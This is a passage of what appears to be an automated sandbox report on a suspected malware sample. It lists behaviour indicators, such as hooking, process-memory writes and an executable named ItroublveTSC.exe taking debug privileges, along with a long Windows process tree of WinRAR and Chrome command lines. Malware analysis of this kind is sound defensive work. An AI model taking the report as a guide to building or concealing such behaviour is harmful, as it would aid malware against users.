chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exemsedge.exemsedge.exesnuvcdsm.exehh.exexwizard.exechrome.exechrome.exechrome.exechrome.exepid process 1916 chrome.exe 1916 chrome.exe 664 chrome.exe 664 chrome.exe 3776 chrome.exe 3776 chrome.exe 3776 chrome.exe 3776 chrome.exe 3224 chrome.exe 3224 chrome.exe 2136 chrome.exe 2136 chrome.exe 400 chrome.exe 400 chrome.exe 2216 chrome.exe 2216 chrome.exe 3032 chrome.exe 3032 chrome.exe 3032 chrome.exe 3032 chrome.exe 2996 msedge.exe 2996 msedge.exe 1808 msedge.exe 1808 msedge.exe 4504 snuvcdsm.exe 4504 snuvcdsm.exe 4504 snuvcdsm.exe 4504 snuvcdsm.exe 4848 hh.exe 4848 hh.exe 4424 xwizard.exe 4424 xwizard.exe 4424 xwizard.exe 4424 xwizard.exe 4424 xwizard.exe 4424 xwizard.exe 4424 xwizard.exe 4424 xwizard.exe 4764 chrome.exe 4764 chrome.exe 4736 chrome.exe 4736 chrome.exe 4840 chrome.exe 4840 chrome.exe 4080 chrome.exe 4080 chrome.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
WinRAR.exeWinRAR.exechrome.exepid process 784 WinRAR.exe 4728 WinRAR.exe 4736 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 44 IoCs
Processes:
chrome.exemsedge.exepid process 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 1808 msedge.exe 1808 msedge.exe 1808 msedge.exe 1808 msedge.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
ItroublveTSC.exeItroublveTSC.exeItroublveTSC.exeItroublveTSC.exeRtkBtManServ.exedescription pid process Token: SeDebugPrivilege 1240 ItroublveTSC.exe Token: SeDebugPrivilege 2308 ItroublveTSC.exe Token: SeDebugPrivilege 2980 ItroublveTSC.exe Token: SeDebugPrivilege 3996 ItroublveTSC.exe Token: SeDebugPrivilege 3676 RtkBtManServ.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exeWinRAR.exeItroublveTSC.exeItroublveTSC.exeItroublveTSC.exepid process 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 1240 ItroublveTSC.exe 1240 ItroublveTSC.exe 1240 ItroublveTSC.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 2308 ItroublveTSC.exe 2308 ItroublveTSC.exe 2308 ItroublveTSC.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 784 WinRAR.exe 2980 ItroublveTSC.exe 2980 ItroublveTSC.exe 2980 ItroublveTSC.exe 784 WinRAR.exe -
Suspicious use of SendNotifyMessage 34 IoCs
Processes:
chrome.exeItroublveTSC.exeItroublveTSC.exeItroublveTSC.exeItroublveTSC.exepid process 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 664 chrome.exe 1240 ItroublveTSC.exe 1240 ItroublveTSC.exe 1240 ItroublveTSC.exe 2308 ItroublveTSC.exe 2308 ItroublveTSC.exe 2308 ItroublveTSC.exe 2980 ItroublveTSC.exe 2980 ItroublveTSC.exe 2980 ItroublveTSC.exe 3996 ItroublveTSC.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
winrar-x64-611.exeuninstall.exeWinRAR.exeItroublveTSC.exeItroublveTSC.exechrome.exechrome.exepid process 444 winrar-x64-611.exe 444 winrar-x64-611.exe 2404 uninstall.exe 784 WinRAR.exe 784 WinRAR.exe 1240 ItroublveTSC.exe 1240 ItroublveTSC.exe 3996 ItroublveTSC.exe 3996 ItroublveTSC.exe 4736 chrome.exe 4080 chrome.exe 4080 chrome.exe 4080 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 664 wrote to memory of 4380 664 chrome.exe chrome.exe PID 664 wrote to memory of 4380 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 2964 664 chrome.exe chrome.exe PID 664 wrote to memory of 1916 664 chrome.exe chrome.exe PID 664 wrote to memory of 1916 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe PID 664 wrote to memory of 4640 664 chrome.exe chrome.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\winrar-x64-611.exe"C:\Users\Admin\AppData\Local\Temp\winrar-x64-611.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:444 -
C:\Program Files\WinRAR\uninstall.exe"C:\Program Files\WinRAR\uninstall.exe" /setup2⤵
- Modifies system executable filetype association
- Executes dropped EXE
- Registers COM server for autorun
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2404
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9836f4f50,0x7ff9836f4f60,0x7ff9836f4f702⤵PID:4380
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1644 /prefetch:22⤵PID:2964
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1980 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1916 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2252 /prefetch:82⤵PID:4640
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2932 /prefetch:12⤵PID:4180
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:12⤵PID:4448
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:12⤵PID:4492
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4464 /prefetch:82⤵PID:4244
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:82⤵PID:740
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4644 /prefetch:82⤵PID:4484
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3776 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5304 /prefetch:82⤵PID:1148
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4680 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3776 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4792 /prefetch:82⤵PID:1956
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5008 /prefetch:82⤵PID:1168
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4952 /prefetch:82⤵PID:1788
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:12⤵PID:4100
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4604 /prefetch:82⤵PID:2064
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5452 /prefetch:82⤵PID:3436
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5704 /prefetch:82⤵PID:4000
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:82⤵PID:4784
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5840 /prefetch:82⤵PID:4340
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5864 /prefetch:82⤵PID:4060
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:82⤵PID:4740
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:12⤵PID:1760
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:12⤵PID:4332
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:82⤵PID:4520
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2196 /prefetch:82⤵PID:1180
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:12⤵PID:3728
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4464 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3224 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:12⤵PID:3136
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2984 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2136 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5848 /prefetch:82⤵PID:4204
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:82⤵PID:4472
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:12⤵PID:1548
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:12⤵PID:3928
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:12⤵PID:4332
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:12⤵PID:2948
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1556 /prefetch:82⤵PID:4188
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4548 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:400 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 /prefetch:82⤵
- Drops file in Program Files directory
PID:3548 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6244 /prefetch:82⤵PID:3948
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:12⤵PID:3404
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:12⤵PID:4048
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5724 /prefetch:82⤵PID:5108
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:82⤵PID:2260
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5648 /prefetch:82⤵PID:2248
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5660 /prefetch:82⤵PID:2532
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:1764
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2216 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:12⤵PID:1512
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:12⤵PID:4532
-
